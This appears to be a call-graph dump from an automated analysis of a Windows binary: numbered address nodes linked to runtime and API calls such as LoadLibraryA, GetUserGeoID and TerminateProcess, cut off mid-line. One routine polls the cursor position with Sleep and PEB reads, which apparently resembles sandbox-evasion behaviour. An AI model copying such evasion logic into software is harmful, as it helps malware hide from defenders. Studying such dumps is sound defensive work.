Concurrency::scheduler_worker_creation_error::scheduler_worker_creation_error 43 API calls 48277->48280 48281 417140 Concurrency::scheduler_worker_creation_error::scheduler_worker_creation_error 43 API calls 48278->48281 48291 4806f4 48279->48291 48280->48261 48283 47fd15 48281->48283 48287 4186f0 46 API calls 48282->48287 48286 417140 Concurrency::scheduler_worker_creation_error::scheduler_worker_creation_error 43 API calls 48283->48286 48284 480900 48285 414fd0 std::ios_base::clear 46 API calls 48284->48285 48289 48090d 48285->48289 48290 47fd20 48286->48290 48288 4801cf 48287->48288 48292 440f20 98 API calls 48288->48292 48293 417140 Concurrency::scheduler_worker_creation_error::scheduler_worker_creation_error 43 API calls 48289->48293 48294 4f2110 43 API calls 48290->48294 48291->48284 48299 4186f0 46 API calls 48291->48299 48317 4801de 48292->48317 48296 480918 48293->48296 48295 47fd2b 48294->48295 48297 4f2110 43 API calls 48295->48297 48300 417140 Concurrency::scheduler_worker_creation_error::scheduler_worker_creation_error 43 API calls 48296->48300 48301 47fd36 48297->48301 48298 4802f2 48304 417140 Concurrency::scheduler_worker_creation_error::scheduler_worker_creation_error 43 API calls 48298->48304 48302 4807c8 48299->48302 48303 480923 48300->48303 48305 4f2110 43 API calls 48301->48305 48306 440f20 98 API calls 48302->48306 48307 4f2110 43 API calls 48303->48307 48308 4802fd 48304->48308 48309 47fd41 48305->48309 48327 4807d7 48306->48327 48310 48092e 48307->48310 48311 417140 Concurrency::scheduler_worker_creation_error::scheduler_worker_creation_error 43 API calls 48308->48311 48312 4f2110 43 API calls 48309->48312 48314 4f2110 43 API calls 48310->48314 48311->48228 48312->48227 48313 4808f5 48315 417140 Concurrency::scheduler_worker_creation_error::scheduler_worker_creation_error 43 API calls 48313->48315 48318 480939 48314->48318 48315->48284 48316 48027a 48319 4150c0 std::bad_exception::bad_exception 46 API calls 48316->48319 48317->48298 48317->48316 48320 4f2110 43 API calls 48318->48320 48322 48029b 48319->48322 48321 480944 48320->48321 48323 4f2110 43 API calls 48321->48323 48324 417140 Concurrency::scheduler_worker_creation_error::scheduler_worker_creation_error 43 API calls 48322->48324 48325 48094f 48323->48325 48326 4802a6 48324->48326 48329 4f2110 43 API calls 48325->48329 48330 417140 Concurrency::scheduler_worker_creation_error::scheduler_worker_creation_error 43 API calls 48326->48330 48327->48313 48328 480875 48327->48328 48331 4150c0 std::bad_exception::bad_exception 46 API calls 48328->48331 48329->48227 48333 4802b1 48330->48333 48332 480896 48331->48332 48335 417140 Concurrency::scheduler_worker_creation_error::scheduler_worker_creation_error 43 API calls 48332->48335 48334 4f2110 43 API calls 48333->48334 48336 4802bc 48334->48336 48337 4808a1 48335->48337 48338 4f2110 43 API calls 48336->48338 48339 417140 Concurrency::scheduler_worker_creation_error::scheduler_worker_creation_error 43 API calls 48337->48339 48340 4802c7 48338->48340 48341 4808ac 48339->48341 48342 4f2110 43 API calls 48340->48342 48343 417140 Concurrency::scheduler_worker_creation_error::scheduler_worker_creation_error 43 API calls 48341->48343 48344 4802d2 48342->48344 48345 4808b7 48343->48345 48346 4f2110 43 API calls 48344->48346 48347 4f2110 43 API calls 48345->48347 48348 4802dd 48346->48348 48349 4808c2 48347->48349 48350 4f2110 43 API calls 48348->48350 48351 4f2110 43 API calls 48349->48351 48350->48227 48352 4808cd 48351->48352 48353 4f2110 43 API calls 48352->48353 48354 4808d8 48353->48354 48355 4f2110 43 API calls 48354->48355 48356 4808e3 48355->48356 48357 4f2110 43 API calls 48356->48357 48357->48227 48358 481580 48359 481592 Concurrency::wait _Error_objects 48358->48359 48360 41a1e0 Concurrency::wait 46 API calls 48359->48360 48361 4816a2 48360->48361 48362 4f5470 46 API calls 48361->48362 48363 4816b1 48362->48363 48364 417140 Concurrency::scheduler_worker_creation_error::scheduler_worker_creation_error 43 API calls 48363->48364 48365 4816bc Concurrency::wait 48364->48365 48366 41a1e0 Concurrency::wait 46 API calls 48365->48366 48367 4817ba 48366->48367 48368 4f5470 46 API calls 48367->48368 48369 4817c9 48368->48369 48370 417140 Concurrency::scheduler_worker_creation_error::scheduler_worker_creation_error 43 API calls 48369->48370 48371 4817d4 Concurrency::wait 48370->48371 48372 41a1e0 Concurrency::wait 46 API calls 48371->48372 48373 4818d2 48372->48373 48374 4f5470 46 API calls 48373->48374 48375 4818e1 48374->48375 48376 417140 Concurrency::scheduler_worker_creation_error::scheduler_worker_creation_error 43 API calls 48375->48376 48377 4818ec Concurrency::wait 48376->48377 48378 41a1e0 Concurrency::wait 46 API calls 48377->48378 48379 481a1d 48378->48379 48380 4f5470 46 API calls 48379->48380 48381 481a2c 48380->48381 48382 417140 Concurrency::scheduler_worker_creation_error::scheduler_worker_creation_error 43 API calls 48381->48382 48383 481a37 Concurrency::wait 48382->48383 48384 41a1e0 Concurrency::wait 46 API calls 48383->48384 48385 481b68 48384->48385 48386 4f5470 46 API calls 48385->48386 48387 481b77 48386->48387 48388 417140 Concurrency::scheduler_worker_creation_error::scheduler_worker_creation_error 43 API calls 48387->48388 48389 481b82 Concurrency::wait 48388->48389 48390 41a1e0 Concurrency::wait 46 API calls 48389->48390 48391 481cb3 48390->48391 48392 4f5470 46 API calls 48391->48392 48393 481cc2 48392->48393 48394 417140 Concurrency::scheduler_worker_creation_error::scheduler_worker_creation_error 43 API calls 48393->48394 48395 481ccd Concurrency::wait 48394->48395 48396 41a1e0 Concurrency::wait 46 API calls 48395->48396 48397 481dfe 48396->48397 48398 4f5470 46 API calls 48397->48398 48399 481e0d 48398->48399 48400 417140 Concurrency::scheduler_worker_creation_error::scheduler_worker_creation_error 43 API calls 48399->48400 48401 481e18 Concurrency::wait 48400->48401 48402 41a1e0 Concurrency::wait 46 API calls 48401->48402 48403 481f49 48402->48403 48404 4f5470 46 API calls 48403->48404 48405 481f58 48404->48405 48406 417140 Concurrency::scheduler_worker_creation_error::scheduler_worker_creation_error 43 API calls 48405->48406 48407 481f63 Concurrency::wait 48406->48407 48408 41a1e0 Concurrency::wait 46 API calls 48407->48408 48409 482094 48408->48409 48410 4f5470 46 API calls 48409->48410 48411 4820a3 48410->48411 48412 417140 Concurrency::scheduler_worker_creation_error::scheduler_worker_creation_error 43 API calls 48411->48412 48413 4820ae Concurrency::wait 48412->48413 48414 41a1e0 Concurrency::wait 46 API calls 48413->48414 48415 4821df 48414->48415 48416 4f5470 46 API calls 48415->48416 48417 4821ee 48416->48417 48418 417140 Concurrency::scheduler_worker_creation_error::scheduler_worker_creation_error 43 API calls 48417->48418 48419 4821f9 Concurrency::wait 48418->48419 48420 41a1e0 Concurrency::wait 46 API calls 48419->48420 48421 48232a 48420->48421 48422 4f5470 46 API calls 48421->48422 48423 482339 48422->48423 48424 417140 Concurrency::scheduler_worker_creation_error::scheduler_worker_creation_error 43 API calls 48423->48424 48425 482344 Concurrency::wait 48424->48425 48426 41a1e0 Concurrency::wait 46 API calls 48425->48426 48427 482475 48426->48427 48428 4f5470 46 API calls 48427->48428 48429 482484 48428->48429 48430 417140 Concurrency::scheduler_worker_creation_error::scheduler_worker_creation_error 43 API calls 48429->48430 48431 48248f Concurrency::wait 48430->48431 48432 41a1e0 Concurrency::wait 46 API calls 48431->48432 48433 4825c0 48432->48433 48434 4f5470 46 API calls 48433->48434 48435 4825cf 48434->48435 48436 417140 Concurrency::scheduler_worker_creation_error::scheduler_worker_creation_error 43 API calls 48435->48436 48437 4825da Concurrency::wait 48436->48437 48438 41a1e0 Concurrency::wait 46 API calls 48437->48438 48439 48270b 48438->48439 48440 4f5470 46 API calls 48439->48440 48441 48271a 48440->48441 48442 417140 Concurrency::scheduler_worker_creation_error::scheduler_worker_creation_error 43 API calls 48441->48442 48443 482725 __aulldiv _memcpy_s Concurrency::wait __vswprintf_s_l 48442->48443 48444 41a1e0 Concurrency::wait 46 API calls 48443->48444 48445 4829a4 48444->48445 48446 442970 58 API calls 48445->48446 48448 4829b0 Concurrency::wait 48446->48448 48447 482de0 Concurrency::wait 48449 41a1e0 Concurrency::wait 46 API calls 48447->48449 48448->48447 48448->48448 48450 41a1e0 Concurrency::wait 46 API calls 48448->48450 48452 482b53 48450->48452 48641 4ee600 48642 4f5470 46 API calls 48641->48642 48643 4ee613 48642->48643 48644 42dc50 GetUserGeoID 48645 42dc7e _memcpy_s 48644->48645 48646 550567 48649 5503d7 48646->48649 48650 550404 48649->48650 48651 550416 48649->48651 48676 53f7c5 GetModuleHandleW 48650->48676 48661 550268 48651->48661 48655 550409 48655->48651 48677 5504b8 GetModuleHandleExW 48655->48677 48656 550453 48662 550274 ___unDNameEx 48661->48662 48683 559a51 EnterCriticalSection 48662->48683 48664 55027e 48684 5502ef 48664->48684 48666 55028b 48688 5502a9 48666->48688 48669 55046e 48693 55049f 48669->48693 48671 550478 48672 55048c 48671->48672 48673 55047c GetCurrentProcess TerminateProcess 48671->48673 48674 5504b8 std::locale::_Setgloballocale 3 API calls 48672->48674 48673->48672 48675 550494 ExitProcess 48674->48675 48676->48655 48678 5504f7 GetProcAddress 48677->48678 48679 550518 48677->48679 48678->48679 48682 55050b 48678->48682 48680 550415 48679->48680 48681 55051e FreeLibrary 48679->48681 48680->48651 48681->48680 48682->48679 48683->48664 48685 5502fb ___unDNameEx std::locale::_Setgloballocale 48684->48685 48687 55035f std::locale::_Setgloballocale 48685->48687 48691 556297 14 API calls 3 library calls 48685->48691 48687->48666 48692 559a99 LeaveCriticalSection 48688->48692 48690 550297 48690->48656 48690->48669 48691->48687 48692->48690 48696 55db81 5 API calls std::locale::_Setgloballocale 48693->48696 48695 5504a4 std::locale::_Setgloballocale 48695->48671 48696->48695 48697 42c9b0 48698 42c9fe __aulldiv __vswprintf_s_l 48697->48698 48699 42cc6a 48698->48699 48702 42cb20 Concurrency::wait 48698->48702 48700 414fd0 std::ios_base::clear 46 API calls 48699->48700 48701 42cc65 48700->48701 48703 41a1e0 Concurrency::wait 46 API calls 48702->48703 48704 42cbf1 48703->48704 48714 4f4470 48704->48714 48706 42cc0b 48707 417140 Concurrency::scheduler_worker_creation_error::scheduler_worker_creation_error 43 API calls 48706->48707 48708 42cc19 Concurrency::scheduler_worker_creation_error::scheduler_worker_creation_error 48707->48708 48709 42c670 2 API calls 48708->48709 48710 42cc2a Concurrency::scheduler_worker_creation_error::scheduler_worker_creation_error 48709->48710 48711 42cc4b Concurrency::wait 48710->48711 48712 42cc47 CreateDirectoryA 48710->48712 48713 417140 Concurrency::scheduler_worker_creation_error::scheduler_worker_creation_error 43 API calls 48711->48713 48712->48711 48713->48701 48715 4f4485 48714->48715 48715->48715 48716 4f89a0 46 API calls 48715->48716 48717 4f44b3 Concurrency::wait 48716->48717 48717->48706 48718 427210 48719 42722d 48718->48719 48784 424730 48719->48784 48721 4272b5 48722 424730 67 API calls 48721->48722 48723 427359 48722->48723 48724 424730 67 API calls 48723->48724 48725 4273fd 48724->48725 48726 424730 67 API calls 48725->48726 48727 4274a1 48726->48727 48728 424730 67 API calls 48727->48728 48729 427544 48728->48729 48730 424730 67 API calls 48729->48730 48731 42760c 48730->48731 48732 424730 67 API calls 48731->48732 48733 4276d4 48732->48733 48734 424730 67 API calls 48733->48734 48735 42779c 48734->48735 48736 424730 67 API calls 48735->48736 48737 427864 48736->48737 48738 424730 67 API calls 48737->48738 48739 42792c 48738->48739 48740 424730 67 API calls 48739->48740 48741 4279f4 48740->48741 48742 424730 67 API calls 48741->48742 48743 427abc 48742->48743 48744 424730 67 API calls 48743->48744 48745 427b84 48744->48745 48746 424730 67 API calls 48745->48746 48747 427c4c 48746->48747 48748 424730 67 API calls 48747->48748 48749 427d14 48748->48749 48750 424730 67 API calls 48749->48750 48751 427ddc 48750->48751 48752 424730 67 API calls 48751->48752 48753 427f76 48752->48753 48754 424730 67 API calls 48753->48754 48757 428041 48754->48757 48755 424730 67 API calls 48756 42837f 48755->48756 48758 424730 67 API calls 48756->48758 48757->48755 48761 42844a 48758->48761 48759 424730 67 API calls 48760 42877c 48759->48760 48762 424730 67 API calls 48760->48762 48761->48759 48763 428844 48762->48763 48764 424730 67 API calls 48763->48764 48765 42890c 48764->48765 48766 424730 67 API calls 48765->48766 48767 4289d4 48766->48767 48768 424730 67 API calls 48767->48768 48769 428a9c 48768->48769 48770 424730 67 API calls 48769->48770 48771 428b64 48770->48771 48772 424730 67 API calls 48771->48772 48773 428c2c 48772->48773 48774 424730 67 API calls 48773->48774 48775 428cf4 48774->48775 48887 425ca0 48775->48887 48777 428dbc 48778 425ca0 70 API calls 48777->48778 48779 428e84 48778->48779 48780 428fff LoadLibraryA 48779->48780 48782 429030 48779->48782 48780->48782 48781 4291d5 48782->48781 48783 4291a4 LoadLibraryA 48782->48783 48783->48781 48785 424768 Concurrency::wait __vswprintf_s_l 48784->48785 48786 41a1e0 Concurrency::wait 46 API calls 48785->48786 48787 4247fd 48786->48787 48788 42484e 48787->48788 48789 414e70 std::ios_base::clear 46 API calls 48787->48789 48790 4248df 48788->48790 48990 4ef210 46 API calls 48788->48990 48789->48788 48791 417140 Concurrency::scheduler_worker_creation_error::scheduler_worker_creation_error 43 API calls 48790->48791 48797 4248ea __aulldiv _memcpy_s __vswprintf_s_l 48791->48797 48793 424894 48991 4172e0 46 API calls ctype 48793->48991 48795 4248f0 48795->48721 48797->48795 48992 554c01 44 API calls 2 library calls 48797->48992 48798 425189 48799 53f1aa 3 API calls 48798->48799 48801 425279 48798->48801 48806 42524c _Error_objects 48799->48806 48800 425302 lstrcpyA 48802 425329 48800->48802 48808 425360 48800->48808 48804 4252f6 48801->48804 48995 4f57c0 46 API calls 48801->48995 48805 53f1aa 3 API calls 48802->48805 48804->48800 48814 425333 _Error_objects 48805->48814 48806->48801 48993 53f0da 46 API calls _Error_objects 48806->48993 48811 4253dd 48808->48811 48998 4f57c0 46 API calls 48808->48998 48809 42526c 48994 53f159 AcquireSRWLockExclusive ReleaseSRWLockExclusive WakeAllConditionVariable 48809->48994 48813 425455 lstrcatA 48811->48813 48818 425498 Concurrency::wait 48813->48818 48814->48808 48996 53f0da 46 API calls _Error_objects 48814->48996 48816 425353 48997 53f159 AcquireSRWLockExclusive ReleaseSRWLockExclusive WakeAllConditionVariable 48816->48997 48819 41a1e0 Concurrency::wait 46 API calls 48818->48819 48820 4254e3 48819->48820 48821 425534 48820->48821 48822 414e70 std::ios_base::clear 46 API calls 48820->48822 48823 4255c5 48821->48823 48999 4ef210 46 API calls 48821->48999 48822->48821 48824 417140 Concurrency::scheduler_worker_creation_error::scheduler_worker_creation_error 43 API calls 48823->48824 48827 4255d0 GetModuleHandleA 48824->48827 48826 42557a 49000 4172e0 46 API calls ctype 48826->49000 48828 4255f6 48827->48828 48832 42562d 48827->48832 48830 53f1aa 3 API calls 48828->48830 48838 425600 _Error_objects 48830->48838 48836 4256aa 48832->48836 49003 4f57c0 46 API calls 48832->49003 48834 4256cf 48839 42571c 48834->48839 48842 53f1aa 3 API calls 48834->48842 48835 4256bc 48837 54eeae ___std_exception_copy 14 API calls 48835->48837 48836->48834 48836->48835 48840 4256c5 48837->48840 48838->48832 49001 53f0da 46 API calls _Error_objects 48838->49001 48846 4257af Concurrency::wait 48839->48846 49006 4f57c0 46 API calls 48839->49006 48840->48795 48847 4256ef _Error_objects 48842->48847 48844 425620 49002 53f159 AcquireSRWLockExclusive ReleaseSRWLockExclusive WakeAllConditionVariable 48844->49002 48850 41a1e0 Concurrency::wait 46 API calls 48846->48850 48847->48839 49004 53f0da 46 API calls _Error_objects 48847->49004 48849 42570f 49005 53f159 AcquireSRWLockExclusive ReleaseSRWLockExclusive WakeAllConditionVariable 48849->49005 48852 42581d 48850->48852 48853 42586e 48852->48853 48854 414e70 std::ios_base::clear 46 API calls 48852->48854 48855 4258ff 48853->48855 49007 4ef210 46 API calls 48853->49007 48854->48853 48857 417140 Concurrency::scheduler_worker_creation_error::scheduler_worker_creation_error 43 API calls 48855->48857 48859 42590a 48857->48859 48858 4258b4 49008 4172e0 46 API calls ctype 48858->49008 48861 4259b1 48859->48861 48862 425999 48859->48862 48864 4259ff 48861->48864 48865 53f1aa 3 API calls 48861->48865 48863 424730 64 API calls 48862->48863 48867 4259a6 Concurrency::wait 48863->48867 48872 425a92 __vswprintf_s_l 48864->48872 49011 4f57c0 46 API calls 48864->49011 48868 4259d2 _Error_objects 48865->48868 48870 41a1e0 Concurrency::wait 46 API calls 48867->48870 48868->48864 49009 53f0da 46 API calls _Error_objects 48868->49009 48877 425b8a 48870->48877 48871 4259f2 49010 53f159 AcquireSRWLockExclusive ReleaseSRWLockExclusive WakeAllConditionVariable 48871->49010 49012 555871 53 API calls 2 library calls 48872->49012 48875 425b09 48878 424730 64 API calls 48875->48878 48876 425bdb 48880 425c6c 48876->48880 49013 4ef210 46 API calls 48876->49013 48877->48876 48879 414e70 std::ios_base::clear 46 API calls 48877->48879 48878->48867 48879->48876 48882 417140 Concurrency::scheduler_worker_creation_error::scheduler_worker_creation_error 43 API calls 48880->48882 48884 425c77 48882->48884 48883 425c21 49014 4172e0 46 API calls ctype 48883->49014 48885 54eeae ___std_exception_copy 14 API calls 48884->48885 48885->48840 48888 425cd8 Concurrency::wait __vswprintf_s_l 48887->48888 48889 41a1e0 Concurrency::wait 46 API calls 48888->48889 48891 425d6d 48889->48891 48890 425dbe 48893 425e4f 48890->48893 49015 4ef210 46 API calls 48890->49015 48891->48890 48892 414e70 std::ios_base::clear 46 API calls 48891->48892 48892->48890 48895 417140 Concurrency::scheduler_worker_creation_error::scheduler_worker_creation_error 43 API calls 48893->48895 48900 425e5a __aulldiv _memcpy_s __vswprintf_s_l 48895->48900 48896 425e04 49016 4172e0 46 API calls ctype 48896->49016 48898 425e60 48898->48777 48900->48898 49017 554c01 44 API calls 2 library calls 48900->49017 48901 4266f9 48902 53f1aa 3 API calls 48901->48902 48903 4267e9 48901->48903 48909 4267bc _Error_objects 48902->48909 48907 426866 48903->48907 49020 4f57c0 46 API calls 48903->49020 48904 426872 lstrcpyA 48906 426899 48904->48906 48912 4268d0 48904->48912 48908 53f1aa 3 API calls 48906->48908 48907->48904 48916 4268a3 _Error_objects 48908->48916 48909->48903 49018 53f0da 46 API calls _Error_objects 48909->49018 48911 4267dc 49019 53f159 AcquireSRWLockExclusive ReleaseSRWLockExclusive WakeAllConditionVariable 48911->49019 48915 42694d 48912->48915 49023 4f57c0 46 API calls 48912->49023 48917 4269c5 lstrcatA 48915->48917 48916->48912 49021 53f0da 46 API calls _Error_objects 48916->49021 48921 426a08 Concurrency::wait 48917->48921 48919 4268c3 49022 53f159 AcquireSRWLockExclusive ReleaseSRWLockExclusive WakeAllConditionVariable 48919->49022 48922 41a1e0 Concurrency::wait 46 API calls 48921->48922 48924 426a53 48922->48924 48923 426aa4 48926 426b35 48923->48926 49024 4ef210 46 API calls 48923->49024 48924->48923 48925 414e70 std::ios_base::clear 46 API calls 48924->48925 48925->48923 48928 417140 Concurrency::scheduler_worker_creation_error::scheduler_worker_creation_error 43 API calls 48926->48928 48930 426b40 GetModuleHandleA 48928->48930 48929 426aea 49025 4172e0 46 API calls ctype 48929->49025 48931 426b66 48930->48931 48935 426b9d 48930->48935 48932 53f1aa 3 API calls 48931->48932 48940 426b70 _Error_objects 48932->48940 48942 426c1a 48935->48942 49028 4f57c0 46 API calls 48935->49028 48936 426c3f 48937 426c2c 48940->48935 48942->48936 48942->48937 48990->48793 48991->48790 48992->48798 48993->48809 48994->48801 48995->48804 48996->48816 48997->48808 48998->48811 48999->48826 49000->48823 49001->48844 49002->48832 49003->48836 49004->48849 49005->48839 49006->48846 49007->48858 49008->48855 49009->48871 49010->48864 49011->48872 49012->48875 49013->48883 49014->48880 49015->48896 49016->48893 49017->48901 49018->48911 49019->48903 49020->48907 49021->48919 49022->48912 49023->48915 49024->48929 49025->48926 49028->48942 49040 433130 GetCursorPos 49046 433149 49040->49046 49041 433156 GetCursorPos 49042 43342f GetPEB 49041->49042 49041->49046 49042->49046 49043 43317e GetPEB 49043->49046 49044 4335d2 Sleep 49044->49046 49045 433306 Sleep GetCursorPos 49045->49042 49045->49046 49046->49041 49046->49042 49046->49043 49046->49044 49046->49045 49047 43333e __aulldiv __vswprintf_s_l 49046->49047 49048 437b10 49049 437b53 Concurrency::wait 49048->49049 49050 41a1e0 Concurrency::wait 46 API calls 49049->49050 49051 437bb3 Concurrency::wait 49050->49051 49051->49051 49052 41a1e0 Concurrency::wait 46 API calls 49051->49052 49053 437c24 Concurrency::wait 49052->49053 49054 43826a Concurrency::wait 49053->49054 49055 41a1e0 Concurrency::wait 46 API calls 49053->49055 49054->49054 49056 41a1e0 Concurrency::wait 46 API calls 49054->49056 49057 437cbb 49055->49057 49058 43850b 49056->49058 49059 53ee6e std::_Facet_Register 17 API calls 49057->49059 49060 53ee6e std::_Facet_Register 17 API calls 49058->49060 49062 437cc5 Concurrency::wait 49059->49062 49061 438515 Concurrency::wait 49060->49061 49064 4f5c80 46 API calls 49061->49064 49063 4f5c80 46 API calls 49062->49063 49065 437d8f Concurrency::wait 49063->49065 49066 4385df Concurrency::wait 49064->49066 49065->49065 49067 41a1e0 Concurrency::wait 46 API calls 49065->49067 49066->49066 49068 41a1e0 Concurrency::wait 46 API calls 49066->49068 49071 437e0f Concurrency::wait 49067->49071 49069 438659 49068->49069 49070 4187e0 46 API calls 49069->49070 49072 438724 49070->49072 49075 41a1e0 Concurrency::wait 46 API calls 49071->49075 49073 509bd0 70 API calls 49072->49073 49074 438736 49073->49074 49076 4398be 49074->49076 49313 4f47f0 59 API calls 49074->49313 49077 437f5a 49075->49077 49079 417140 Concurrency::scheduler_worker_creation_error::scheduler_worker_creation_error 43 API calls 49076->49079 49080 509bd0 70 API calls 49077->49080 49084 4398c9 49079->49084 49081 437f69 49080->49081 49082 43825f 49081->49082 49308 4f47f0 59 API calls 49081->49308 49085 417140 Concurrency::scheduler_worker_creation_error::scheduler_worker_creation_error 43 API calls 49082->49085 49083 43989f 49333 4f1460 46 API calls 3 library calls 49083->49333 49087 439b07 49084->49087 49094 439b2e Concurrency::wait 49084->49094 49085->49054 49089 439b1b 49087->49089 49091 417140 Concurrency::scheduler_worker_creation_error::scheduler_worker_creation_error 43 API calls 49087->49091 49092 417140 Concurrency::scheduler_worker_creation_error::scheduler_worker_creation_error 43 API calls 49089->49092 49090 438781 49090->49083 49314 4f4600 46 API calls 3 library calls 49090->49314 49091->49089 49093 439b26 49092->49093 49094->49094 49098 41a1e0 Concurrency::wait 46 API calls 49094->49098 49095 438240 49312 4f1460 46 API calls 3 library calls 49095->49312 49099 439ba6 49098->49099 49101 53ee6e std::_Facet_Register 17 API calls 49099->49101 49100 437fb4 49100->49095 49309 4f4600 46 API calls 3 library calls 49100->49309 49105 439bb0 Concurrency::wait 49101->49105 49103 4388ac 49103->49083 49315 4f4600 46 API calls 3 library calls 49103->49315 49107 4f5c80 46 API calls 49105->49107 49106 4380b6 49106->49095 49310 4f4600 46 API calls 3 library calls 49106->49310 49111 439c77 Concurrency::wait 49107->49111 49109 4389ae 49316 4f4600 46 API calls 3 library calls 49109->49316 49111->49111 49113 41a1e0 Concurrency::wait 46 API calls 49111->49113 49112 43818f Concurrency::wait 49311 506eb0 46 API calls __Getctype 49112->49311 49120 439cf1 49113->49120 49114 438cfb 49320 4f4600 46 API calls 3 library calls 49114->49320 49115 438a82 49115->49114 49317 4f4600 46 API calls 3 library calls 49115->49317 49117 4381e1 49121 417140 Concurrency::scheduler_worker_creation_error::scheduler_worker_creation_error 43 API calls 49117->49121 49122 4381f4 Concurrency::wait 49117->49122 49124 4187e0 46 API calls 49120->49124 49121->49122 49123 417140 Concurrency::scheduler_worker_creation_error::scheduler_worker_creation_error 43 API calls 49122->49123 49123->49095 49125 439dbc 49124->49125 49128 509bd0 70 API calls 49125->49128 49126 438dc7 49321 4f4600 46 API calls 3 library calls 49126->49321 49127 438b84 49318 4f4600 46 API calls 3 library calls 49127->49318 49129 439dce 49128->49129 49132 43a7f3 49129->49132 49334 4f47f0 59 API calls 49129->49334 49134 417140 Concurrency::scheduler_worker_creation_error::scheduler_worker_creation_error 43 API calls 49132->49134 49133 438e9b 49322 4f4600 46 API calls 3 library calls 49133->49322 49138 43a7fe 49134->49138 49137 438c58 Concurrency::wait 49319 506eb0 46 API calls __Getctype 49137->49319 49140 43aa63 49138->49140 49141 43aa3c 49138->49141 49139 43a7d4 49348 4f1460 46 API calls 3 library calls 49139->49348 49146 414fd0 std::ios_base::clear 46 API calls 49140->49146 49144 43aa50 49141->49144 49148 417140 Concurrency::scheduler_worker_creation_error::scheduler_worker_creation_error 43 API calls 49141->49148 49149 417140 Concurrency::scheduler_worker_creation_error::scheduler_worker_creation_error 43 API calls 49144->49149 49145 438caa 49151 417140 Concurrency::scheduler_worker_creation_error::scheduler_worker_creation_error 43 API calls 49145->49151 49153 438cb8 Concurrency::wait 49145->49153 49150 43aa7a 49146->49150 49147 438f79 49147->49083 49323 4f4600 46 API calls 3 library calls 49147->49323 49148->49144 49149->49093 49152 53ee6e std::_Facet_Register 17 API calls 49150->49152 49151->49153 49158 43aa84 49152->49158 49154 417140 Concurrency::scheduler_worker_creation_error::scheduler_worker_creation_error 43 API calls 49153->49154 49154->49114 49156 439e19 49156->49139 49335 4f4600 46 API calls 3 library calls 49156->49335 49349 4eede0 46 API calls 49158->49349 49159 43907b 49324 4f4600 46 API calls 3 library calls 49159->49324 49162 43ab7d 49163 414fd0 std::ios_base::clear 46 API calls 49162->49163 49165 43ab8c 49163->49165 49164 439f3a 49164->49139 49336 4f4600 46 API calls 3 library calls 49164->49336 49167 414fd0 std::ios_base::clear 46 API calls 49165->49167 49166 43914f 49261 43982c 49166->49261 49325 4f4600 46 API calls 3 library calls 49166->49325 49169 43aba7 49167->49169 49171 509bd0 70 API calls 49169->49171 49170 439888 49170->49083 49176 417140 Concurrency::scheduler_worker_creation_error::scheduler_worker_creation_error 43 API calls 49170->49176 49172 43abb6 49171->49172 49175 43afc7 49172->49175 49350 4f47f0 59 API calls 49172->49350 49178 417140 Concurrency::scheduler_worker_creation_error::scheduler_worker_creation_error 43 API calls 49175->49178 49176->49083 49184 43afd2 49178->49184 49179 43a032 49337 4f4600 46 API calls 3 library calls 49179->49337 49180 439251 49326 4f4600 46 API calls 3 library calls 49180->49326 49183 43afa8 49359 4f1460 46 API calls 3 library calls 49183->49359 49187 414fd0 std::ios_base::clear 46 API calls 49184->49187 49185 439325 49327 4f4600 46 API calls 3 library calls 49185->49327 49191 43b212 49187->49191 49188 43abf6 49188->49183 49351 4f4600 46 API calls 3 library calls 49188->49351 49190 43a2fe 49342 4f4600 46 API calls 3 library calls 49190->49342 49195 414fd0 std::ios_base::clear 46 API calls 49191->49195 49192 43a106 49192->49190 49338 4f4600 46 API calls 3 library calls 49192->49338 49197 43b2d3 49195->49197 49198 433be0 92 API calls 49197->49198 49233 43b2df Concurrency::scheduler_worker_creation_error::scheduler_worker_creation_error 49198->49233 49199 43acf8 49199->49183 49352 4f4600 46 API calls 3 library calls 49199->49352 49200 43a1fe 49339 4f4600 46 API calls 3 library calls 49200->49339 49201 43a3c0 49343 4f4600 46 API calls 3 library calls 49201->49343 49205 439403 Concurrency::wait 49213 41a1e0 Concurrency::wait 46 API calls 49205->49213 49205->49261 49206 43a2d2 49340 4f48c0 46 API calls 49206->49340 49207 43add1 49353 4f48c0 46 API calls 49207->49353 49210 43a2ea 49341 41b3b0 43 API calls 2 library calls 49210->49341 49211 43ade9 49354 41b3b0 43 API calls 2 library calls 49211->49354 49212 43b4b2 49216 43bfaa 49212->49216 49221 414fd0 std::ios_base::clear 46 API calls 49212->49221 49217 43956e 49213->49217 49222 417140 Concurrency::scheduler_worker_creation_error::scheduler_worker_creation_error 43 API calls 49216->49222 49328 506f90 46 API calls 49217->49328 49218 43a2f3 49224 417140 Concurrency::scheduler_worker_creation_error::scheduler_worker_creation_error 43 API calls 49218->49224 49219 43adf5 49220 417140 Concurrency::scheduler_worker_creation_error::scheduler_worker_creation_error 43 API calls 49219->49220 49225 43ae00 49220->49225 49226 43b4db 49221->49226 49228 43bfb5 49222->49228 49224->49190 49355 4f4600 46 API calls 3 library calls 49225->49355 49230 53ee6e std::_Facet_Register 17 API calls 49226->49230 49227 43a494 49227->49139 49344 4f4600 46 API calls 3 library calls 49227->49344 49231 417140 Concurrency::scheduler_worker_creation_error::scheduler_worker_creation_error 43 API calls 49228->49231 49229 4395a0 49329 4f4600 46 API calls 3 library calls 49229->49329 49268 43b4e5 __aulldiv __vswprintf_s_l 49230->49268 49237 43bfc0 49231->49237 49233->49212 49360 42bcc0 55 API calls 4 library calls 49233->49360 49239 43c215 49237->49239 49241 417140 Concurrency::scheduler_worker_creation_error::scheduler_worker_creation_error 43 API calls 49237->49241 49238 43b498 49361 41b3b0 43 API calls 2 library calls 49238->49361 49242 417140 Concurrency::scheduler_worker_creation_error::scheduler_worker_creation_error 43 API calls 49239->49242 49241->49239 49242->49093 49243 439673 49330 4f4600 46 API calls 3 library calls 49243->49330 49244 43aea3 49244->49183 49356 4f4600 46 API calls 3 library calls 49244->49356 49245 43b4a7 49246 417140 Concurrency::scheduler_worker_creation_error::scheduler_worker_creation_error 43 API calls 49245->49246 49246->49212 49247 43a7bd 49247->49139 49252 417140 Concurrency::scheduler_worker_creation_error::scheduler_worker_creation_error 43 API calls 49247->49252 49248 43a58c 49255 414fd0 std::ios_base::clear 46 API calls 49248->49255 49267 43a761 49248->49267 49252->49139 49253 439747 49331 4f4600 46 API calls 3 library calls 49253->49331 49254 43af7c 49357 4f48c0 46 API calls 49254->49357 49257 43a688 49255->49257 49345 4f46f0 46 API calls 49257->49345 49259 43af94 49358 41b3b0 43 API calls 2 library calls 49259->49358 49261->49170 49332 4f1460 46 API calls 3 library calls 49261->49332 49263 43af9d 49264 417140 